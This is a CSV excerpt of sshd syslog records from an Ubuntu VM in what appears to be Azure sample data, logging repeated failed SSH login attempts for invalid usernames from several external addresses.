+17985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:02,UbuntuDevEnv,2019-06-26 09:32:02,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 59992:11: Bye Bye [preauth],72205,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,59992,,
+17986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:19,UbuntuDevEnv,2019-06-26 09:32:19,auth,UbuntuDevEnv,info,Invalid user vbox from 118.24.90.122 port 26252,72281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vbox,118.24.90.1,26252,,
+17987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:20,UbuntuDevEnv,2019-06-26 09:32:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:20,UbuntuDevEnv,2019-06-26 09:32:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,72281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:21,UbuntuDevEnv,2019-06-26 09:32:20,auth,UbuntuDevEnv,info,Failed password for invalid user vbox from 118.24.90.122 port 26252 ssh2,72281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vbox,118.24.90.1,26252,,
+17990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:21,UbuntuDevEnv,2019-06-26 09:32:21,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 26252:11: Bye Bye [preauth],72281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,26252,,
+17991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:21,UbuntuDevEnv,2019-06-26 09:32:21,auth,UbuntuDevEnv,info,Disconnected from invalid user vbox 118.24.90.122 port 26252 [preauth],72281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vbox,118.24.90.1,26252,,
+17992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:41,UbuntuDevEnv,2019-06-26 09:32:40,auth,UbuntuDevEnv,info,Invalid user calude from 165.22.203.187 port 39492,72367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,165.22.203.1,39492,,
+17993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:41,UbuntuDevEnv,2019-06-26 09:32:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,72367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:41,UbuntuDevEnv,2019-06-26 09:32:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:43,UbuntuDevEnv,2019-06-26 09:32:43,auth,UbuntuDevEnv,info,Failed password for invalid user calude from 165.22.203.187 port 39492 ssh2,72367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,165.22.203.1,39492,,
+17996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:43,UbuntuDevEnv,2019-06-26 09:32:43,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 39492:11: Bye Bye [preauth],72367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,39492,,
+17997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:43,UbuntuDevEnv,2019-06-26 09:32:43,auth,UbuntuDevEnv,info,Disconnected from invalid user calude 165.22.203.187 port 39492 [preauth],72367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,165.22.203.1,39492,,
+17998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:46,UbuntuDevEnv,2019-06-26 09:32:45,auth,UbuntuDevEnv,info,Invalid user speech-dispatcher from 115.159.216.187 port 57800,72371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,speech,115.159.216.1,57800,,
+17999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:46,UbuntuDevEnv,2019-06-26 09:32:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:46,UbuntuDevEnv,2019-06-26 09:32:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,72371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:48,UbuntuDevEnv,2019-06-26 09:32:47,auth,UbuntuDevEnv,info,Failed password for invalid user speech-dispatcher from 115.159.216.187 port 57800 ssh2,72371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,speech,115.159.216.1,57800,,
+18002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:48,UbuntuDevEnv,2019-06-26 09:32:48,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 57800:11: Bye Bye [preauth],72371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,57800,,
+18003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:32:48,UbuntuDevEnv,2019-06-26 09:32:48,auth,UbuntuDevEnv,info,Disconnected from invalid user speech-dispatcher 115.159.216.187 port 57800 [preauth],72371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,speech,115.159.216.1,57800,,
+18004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:13,UbuntuDevEnv,2019-06-26 09:33:13,auth,UbuntuDevEnv,info,Invalid user admin from 176.31.202.90 port 57658,72481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.202.9,57658,,
+18005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:13,UbuntuDevEnv,2019-06-26 09:33:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:13,UbuntuDevEnv,2019-06-26 09:33:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,72481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:15,UbuntuDevEnv,2019-06-26 09:33:14,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 176.31.202.90 port 57658 ssh2,72481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.202.9,57658,,
+18008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:15,UbuntuDevEnv,2019-06-26 09:33:14,auth,UbuntuDevEnv,info,Connection closed by 118.24.90.122 port 35480 [preauth],72478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,35480,,
+18009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:15,UbuntuDevEnv,2019-06-26 09:33:14,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 57658:11: Bye Bye [preauth],72481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,57658,,
+18010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:15,UbuntuDevEnv,2019-06-26 09:33:14,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 176.31.202.90 port 57658 [preauth],72481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.202.9,57658,,
+18011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:18,UbuntuDevEnv,2019-06-26 09:33:18,auth,UbuntuDevEnv,info,Invalid user guest from 176.31.43.255 port 53634,72501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,176.31.43.2,53634,,
+18012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:18,UbuntuDevEnv,2019-06-26 09:33:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,72501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:18,UbuntuDevEnv,2019-06-26 09:33:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:20,UbuntuDevEnv,2019-06-26 09:33:20,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 176.31.43.255 port 53634 ssh2,72501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,176.31.43.2,53634,,
+18015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:20,UbuntuDevEnv,2019-06-26 09:33:20,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 53634:11: Bye Bye [preauth],72501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,53634,,
+18016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:20,UbuntuDevEnv,2019-06-26 09:33:20,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 176.31.43.255 port 53634 [preauth],72501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,176.31.43.2,53634,,
+18017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:45,UbuntuDevEnv,2019-06-26 09:33:44,auth,UbuntuDevEnv,info,Invalid user planeacion from 45.55.190.46 port 35690,72552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,planeacion,45.55.190.4,35690,,
+18018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:45,UbuntuDevEnv,2019-06-26 09:33:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:45,UbuntuDevEnv,2019-06-26 09:33:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,72552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+18020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:46,UbuntuDevEnv,2019-06-26 09:33:46,auth,UbuntuDevEnv,info,Failed password for invalid user planeacion from 45.55.190.46 port 35690 ssh2,72552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,planeacion,45.55.190.4,35690,,
+18021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:47,UbuntuDevEnv,2019-06-26 09:33:46,auth,UbuntuDevEnv,info,Disconnected from invalid user planeacion 45.55.190.46 port 35690 [preauth],72552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,planeacion,45.55.190.4,35690,,
+18022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:47,UbuntuDevEnv,2019-06-26 09:33:46,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 35690:11: Bye Bye [preauth],72552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,35690,,
+18023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:53,UbuntuDevEnv,2019-06-26 09:33:52,auth,UbuntuDevEnv,info,Invalid user eugenie from 187.6.249.142 port 48664,72620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eugenie,187.6.249.1,48664,,
+18024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:53,UbuntuDevEnv,2019-06-26 09:33:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:53,UbuntuDevEnv,2019-06-26 09:33:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,72620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:55,UbuntuDevEnv,2019-06-26 09:33:54,auth,UbuntuDevEnv,info,Failed password for invalid user eugenie from 187.6.249.142 port 48664 ssh2,72620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eugenie,187.6.249.1,48664,,
+18027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:55,UbuntuDevEnv,2019-06-26 09:33:55,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 48664:11: Bye Bye [preauth],72620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,48664,,
+18028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:33:55,UbuntuDevEnv,2019-06-26 09:33:55,auth,UbuntuDevEnv,info,Disconnected from invalid user eugenie 187.6.249.142 port 48664 [preauth],72620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eugenie,187.6.249.1,48664,,
+18029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:05,UbuntuDevEnv,2019-06-26 09:34:04,auth,UbuntuDevEnv,info,Invalid user chan from 118.24.90.122 port 45454,72655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chan,118.24.90.1,45454,,
+18030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:05,UbuntuDevEnv,2019-06-26 09:34:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,72655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+18031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:05,UbuntuDevEnv,2019-06-26 09:34:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:05,UbuntuDevEnv,2019-06-26 09:34:05,auth,UbuntuDevEnv,info,Invalid user user from 165.22.203.187 port 33100,72667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,165.22.203.1,33100,,
+18033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:05,UbuntuDevEnv,2019-06-26 09:34:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:05,UbuntuDevEnv,2019-06-26 09:34:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,72667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:07,UbuntuDevEnv,2019-06-26 09:34:07,auth,UbuntuDevEnv,info,Failed password for invalid user chan from 118.24.90.122 port 45454 ssh2,72655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chan,118.24.90.1,45454,,
+18036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:08,UbuntuDevEnv,2019-06-26 09:34:07,auth,UbuntuDevEnv,info,Failed password for invalid user user from 165.22.203.187 port 33100 ssh2,72667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,165.22.203.1,33100,,
+18037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:08,UbuntuDevEnv,2019-06-26 09:34:07,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 33100:11: Bye Bye [preauth],72667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,33100,,
+18038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:08,UbuntuDevEnv,2019-06-26 09:34:07,auth,UbuntuDevEnv,info,Disconnected from invalid user user 165.22.203.187 port 33100 [preauth],72667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,165.22.203.1,33100,,
+18039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:08,UbuntuDevEnv,2019-06-26 09:34:08,auth,UbuntuDevEnv,info,Disconnected from invalid user chan 118.24.90.122 port 45454 [preauth],72655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chan,118.24.90.1,45454,,
+18040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:08,UbuntuDevEnv,2019-06-26 09:34:08,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 45454:11: Bye Bye [preauth],72655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,45454,,
+18041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:32,UbuntuDevEnv,2019-06-26 09:34:32,auth,UbuntuDevEnv,info,Invalid user vianney from 115.159.216.187 port 37625,72764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vianney,115.159.216.1,37625,,
+18042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:32,UbuntuDevEnv,2019-06-26 09:34:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,72764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:32,UbuntuDevEnv,2019-06-26 09:34:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:34,UbuntuDevEnv,2019-06-26 09:34:34,auth,UbuntuDevEnv,info,Failed password for invalid user vianney from 115.159.216.187 port 37625 ssh2,72764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vianney,115.159.216.1,37625,,
